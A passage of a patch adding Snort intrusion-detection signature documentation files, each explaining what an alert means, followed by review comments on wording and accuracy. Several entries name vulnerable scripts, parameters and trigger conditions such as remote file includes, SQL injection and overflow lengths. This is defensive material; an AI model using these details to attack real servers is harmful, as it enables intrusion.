+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
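Review bot: "Summary:" and "Detailed Information:" are the generic CGI text and nothing in the file says which CGI script or request SID 843 matches; add the script name the rule looks for so the event can be triaged. "running ona web server" is missing a space, "attackers choosing" should be "attacker's choosing", the line ending "can be exploited by the attacker." runs well past the wrap width used in the rest of the paragraph, and "Additional References:" is empty.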
--- /dev/null
+++ b/doc/signatures/100000415.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000415
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Bytehoard" application running on a webserver. Access to the file "server.php" using a remote file being passed as the "bhconfig[bhfilepath]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "bhconfig[bhfilepath]" parameter in the "server.php" script used by the "Bytehoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Bytehoard
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
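Review bot: The third paragraph of "Detailed Information:" and the "Attack Scenarios:" section describe supplying credentials to an authentication mechanism, which has nothing to do with a remote file passed in the "bhconfig[bhfilepath]" parameter of "server.php"; replace them with the RFI scenario from the "Summary:". The file also begins with two blank lines before "Rule:", "running ona web server" is missing a space, "an exploitation attempt has been attempted" is redundant, and "attackers choosing" should be "attacker's choosing".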
--- /dev/null
+++ b/doc/signatures/1787.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1787
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
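Review bot: The body of this file is word for word the text of 843.txt earlier in this patch, with nothing specific to SID 1787; say which CGI script this rule matches and how it differs from 843. The same fixes apply: "ona" is missing a space, "attackers choosing" should be "attacker's choosing", the line ending "can be exploited by the attacker." exceeds the wrap width, and "Additional References:" is empty.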
--- /dev/null
+++ b/doc/signatures/100000809.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000809
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "RW Download" application running on a webserver. Access to the file "stats.php" using a remote file being passed as the "root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root_path" parameter in the "stats.php" script used by the "RW Download" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using RW Download
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
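Review bot: Again the credential-based paragraph in "Detailed Information:" and the "Attack Scenarios:" text do not describe a remote file include through the "root_path" parameter of "stats.php"; swap them for the RFI scenario the "Summary:" gives. The file starts with two blank lines before "Rule:", "running ona web server" is missing a space, "an exploitation attempt has been attempted" is redundant, "attackers choosing" should be "attacker's choosing", and "Affected Systems:" and "Contributors:" lack the blank line before "--".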
--- /dev/null
+++ b/doc/signatures/100000543.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000543
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Dating Agent" application running on a webserver. Access 
+to the file "search.php" with SQL commands being passed as the "sex" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "sex" parameter in the "search.php" script used by the 
+"Dating Agent" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Dating Agent
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
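Review bot: "it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries" in "Detailed Information:" is a comma splice; split it after "application". The third paragraph there (credential validation boilerplate) does not describe SQL injection through the "sex" parameter of "search.php" and should go; the "Attack Scenarios:" text does fit and can stay. "running ona web server" is missing a space, "an exploitation attempt has been attempted" is redundant, "attackers choosing" should be "attacker's choosing", and "Affected Systems:" and "Contributors:" lack the blank line before "--".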
--- /dev/null
+++ b/doc/signatures/2133.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 2133
+
+
+--
+Summary:
+This event is generated when an attempt is made to access a Microsoft Biztalk Server application from sources external to the protected network. 
+
+--
+Impact:
+Arbitrary code execution and possible administrator access to the target host.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a Biztalk Server application. A buffer overrun exists in Biztalk that may lead to an attacker gaining the ability to execute arbitrary code on the host with the privileges of the user running the IIS webserver.
+
+The flaw exists in the HTTP Receiver functionality of Biztalk and this is not enabled by default.
+
+--
+Affected Systems:
+Any host using Microsoft Biztalk.
+
+--
+Attack Scenarios:
+An attacker would need to supply an overly long HTTP POST request to biztalkhttpreceive.dll.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Disable the HTTP Receive functionality.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7469
+http://www.securityfocus.com/bid/7470
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0117
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0118
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/ms03-016.asp
+
+--
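Review bot: "False Positives: None Known." is inconsistent with the "Summary:", which says the event fires on any "attempt ... to access a Microsoft Biztalk Server application from sources external to the protected network"; a legitimate external partner using the HTTP Receive function will trigger it and should be listed. "Sid: 2133" puts the number on the label line, unlike every other file in the set. "HTTP Receiver functionality" in "Detailed Information:" and "HTTP Receive functionality" in "Corrective Action:" should use one name.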
--- /dev/null
+++ b/doc/signatures/3441.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+3441
+
+--
+Summary:
+This event is generated when an attempt is made to use the PORT command
+in an FTP session.
+
+--
+Impact:
+Serious. Unauthorized access to the target host. Information disclosure.
+
+--
+Detailed Information:
+The PORT command can be used in an FTP PORT bounce attack to establish
+a connection between the FTP server and another machine listening on 
+an alternative port.
+
+This may lead to unauthorized access to a target host listening on a 
+port not available from outside the protected network.
+
+--
+Affected Systems:
+	Systems using FTP
+
+--
+Attack Scenarios:
+An attacker can issue a PORT command from an FTP session to connect to 
+another machine listening on an alternate port. For example, from an 
+FTP session an attacker could connect to an internal host listening on 
+an alternate web port meant only for internal sessions.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/tech_tips/ftp_port_attacks.html
+
+--
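Review bot: "False Positives: None known." cannot stand next to a "Summary:" that says the event fires "when an attempt is made to use the PORT command in an FTP session": PORT is the normal active-mode data channel setup, so every active-mode transfer crossing the sensor will raise this event; list that, and narrow the documented trigger to a PORT whose address is not the connecting client's. "Corrective Action:" ("Ensure the system is using an up to date version of the software") is generic patching advice while "Detailed Information:" describes a protocol bounce; add the configuration mitigation the cited CERT tech tip covers, refusing PORT commands that name a host other than the client.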
--- /dev/null
+++ b/doc/signatures/1392.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1392
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
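Review bot: This file repeats the text of 843.txt and 1787.txt verbatim, so a reader cannot tell what SID 1392 matches or why it exists separately; name the CGI script the rule looks for. The same copy errors carry over: "ona" is missing a space, "attackers choosing" should be "attacker's choosing", the line ending "can be exploited by the attacker." exceeds the wrap width, and "Additional References:" is empty.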
--- /dev/null
+++ b/doc/signatures/2429.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2429
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
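Review bot: The Affected Systems entry "ISC INN 2.4 .0" has a stray space inside the version string and should read 2.4.0; the same artifact appears in other files in this patch and looks like version fields being joined without trimming, so it is worth fixing wherever these files are generated. Additional References is empty for a buffer overflow that already has a fix ("Upgrade to the latest non-affected version"), "attackers choosing" should be "attacker's choosing", and "Rule:" and "-- " carry trailing whitespace.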
--- /dev/null
+++ b/doc/signatures/2339.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid: 
+2339
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Verilink Netengine Broadband Routers.
+
+--
+Impact:
+Denial of Service (DoS)
+
+--
+Detailed Information:
+TFTP is used to transfer files between hosts. This event is indicative of spurious
+activity in TFTP traffic from a host to a router.
+
+It is possible for an attacker to expoit a DoS condition in
+Netengine routers. If a UDP packet containing a double-null opcode is
+sent to the router's TFTP port the router may crash, thus causing the
+DoS.
+
+--
+Affected Systems:
+	Verilink Netengine Broadband Routers
+
+--
+Attack Scenarios:
+An attacker may use a publicly available exploit script to take
+advantage of the vulnerability.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <matthew.watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
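Review bot: "expoit" in Detailed Information is a typo for "exploit", and the opening sentence ("This event is indicative of spurious activity in TFTP traffic from a host to a router") is too vague to triage on; the concrete trigger is already stated in the next paragraph (a UDP packet with a double-null opcode sent to the router's TFTP port), so lead with that. Additional References is empty even though Attack Scenarios says a publicly available exploit script exists; cite the advisory so Affected Systems can name the Netengine firmware versions rather than only the product family.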
--- /dev/null
+++ b/doc/signatures/2519.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2519
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of the Private
+Communications Transport (PCT) protocol.
+
+--
+Impact:
+Execution of arbitrary code. Unauthorized administrative access to an
+affected host.
+
+--
+Detailed Information:
+A vulnerability exists in the handling of PCT requests that
+can be manipulated to give an attacker the opportunity to execute
+arbitrary code of their choosing leading to a possible remote
+administrative compromize of an affected host.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003 and XP systems using PCT
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted PCT request to an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the use of PCT
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
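Review bot: "compromize" (Detailed Information) and "attcker" (Attack Scenarios) are typos. Additional References is empty for a Microsoft PCT/SSL library flaw that Corrective Action says has a vendor patch; cite the Microsoft security bulletin, and add the missing terminating periods to the two Corrective Action lines.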
--- /dev/null
+++ b/doc/signatures/100000730.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000730
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "BlackList.Examine.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "BlackList.Examine.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
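Review bot: The parameter is written as "$_CONF[path]" in the Summary and Detailed Information, but the leading "$" is a PHP sigil, not part of the query-string parameter name; please confirm whether the rule's content match is "_CONF[path]" and make the documentation reflect what the rule actually inspects. The third Detailed Information paragraph and the Attack Scenarios text (an attacker supplying "his/her own credentials" to an authentication mechanism) are generic CGI boilerplate and do not describe a remote file include; "ona web server" is a typo for "on a web server", and "an exploitation attempt has been attempted" is redundant.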
--- /dev/null
+++ b/doc/signatures/2250.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2250
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Magic Winmail Server.
+
+--
+Impact:
+Serious. Possible arbitrary code execution.
+
+--
+Detailed Information:
+The Magic Winmail Server contains a programming error such that 
+exploitation of the USER POP3 command is possible by supplying malicious
+code via the USER command.
+
+--
+Affected Systems:
+	AMAX Information Technologies Inc. Magic Winmail Server 2.3
+
+--
+Attack Scenarios:
+The attacker can connect to the POP3 server and use the USER command to 
+supply the necessary code or the attacker can use the available exploit 
+code.
+
+--
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
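Review bot: The Detailed Information paragraph is circular: it says the USER POP3 command can be exploited "by supplying malicious code via the USER command" without naming the defect; state what the programming error is so the reader understands why the rule inspects the USER argument. Additional References is empty although Ease of Attack says exploit code is available; cite the advisory. "Rule:", "Summary:" and "-- " lines carry trailing whitespace.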
--- /dev/null
+++ b/doc/signatures/2551.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2551
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
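Review bot: The Affected Systems list has stray spaces inside every version string ("9.0.4 .0", "2.0 .0.4", "9.0.2 .3") and repeats the vendor ("Oracle Oracle9i"); these should read 9.0.4.0, 2.0.0.4 and so on. Detailed Information attributes the overrun to poor length checking of "an HTTP Header" but then says the trigger is a large "HTTP Request Method", which is part of the request line rather than a header; pick the one the advisory describes. The False Negatives note about ports 7777 and 7778 is exactly the kind of deployment caveat the other HTTP signatures in this patch are missing.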
--- /dev/null
+++ b/doc/signatures/1366.txt
@@ -0,0 +1,56 @@
+Rule: 
+
+--
+Sid: 1366
+
+-- 
+Summary: 
+This event is generated when execution of a "mail" command using the path /bin/mail is attempted via HTTP.
+
+-- 
+Impact: 
+Possible intelligence gathering. This may be an attempt to gain information using mail to access sensitive files on a webserver.
+
+-- 
+Detailed Information: 
+This may be an attempt to gain intelligence from sensitive system files on a webserver. This rule generates an event when a "mail" command is used over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. 
+
+The "mail" command is used to read and send email on UNIX systems. The rule looks for the "mail" command in the client to web server network traffic and does not indicate whether the command was actually successful. The presence of the "mail" command in the URL indicates that an attacker attempted to trick the web server into executing a system command in non-interactive mode i.e. without a valid shell session. 
+
+This rule may also generate an event if it detects this command in an unencrypted HTTP tunneling connection to the server or a shell connection through an exploit of the web server.
+
+-- 
+Attack Scenarios: 
+The attacker can make a standard HTTP request that contains the path to the "mail" command in the URI, which can then return requested files to an external destination.
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action:
+Webservers should not be allowed to view or execute files and binaries outside of its designated web root or cgi-bin.
+
+This command may also be requested on a command line should the attacker gain access to the machine. 
+
+Non-essential binaries should be removed from a webserver once it is in production.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
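Review bot: This file has no Affected Systems section; the template used by the other files in this patch places one between Detailed Information and Attack Scenarios. In Corrective Action, "This command may also be requested on a command line should the attacker gain access to the machine" is not a corrective action and belongs in Detailed Information, and "Webservers should not be allowed ... outside of its designated web root" should read "their designated web root".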
--- /dev/null
+++ b/doc/signatures/3076.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3076
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"unsubscribe" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
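Review bot: "associated with the several commands of an IMAP service" (Summary) and "An attacker can supplied" (Attack Scenarios) are grammatical errors, and "Brian Caswell<bmc@sourcefire.com>" is missing a space before the address. The Summary describes the flaw generically while Detailed Information names Mercury Mail specifically; Additional References is empty, so cite the Mercury advisory that backs the 3.32 and 4.01a entries under Affected Systems.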
--- /dev/null
+++ b/doc/signatures/1126.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+1126
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+In this case, this event indicates an attempt to access the file
+_AuthChangeUrl which may indicate that an exploit attempt has been
+sucessful in changing user information on an IIS host or that an attempt
+has been made to enumerate accounts on an IIS host.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
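Review bot: Detailed Information says access to _AuthChangeUrl "may indicate that an exploit attempt has been sucessful in changing user information"; the rule only sees the request, so a match cannot show success, and "sucessful" is misspelled. The same paragraph ties the file to IIS, so Affected Systems ("All systems using a web server") is too broad and should name IIS. Additional References is empty, and "attackers choosing" should be "attacker's choosing".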
--- /dev/null
+++ b/doc/signatures/100000431.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000431
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BlueShoes" application running on a webserver. Access to the file "fileBrowserInner.php" using a remote file being passed as the "APP[path][core]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
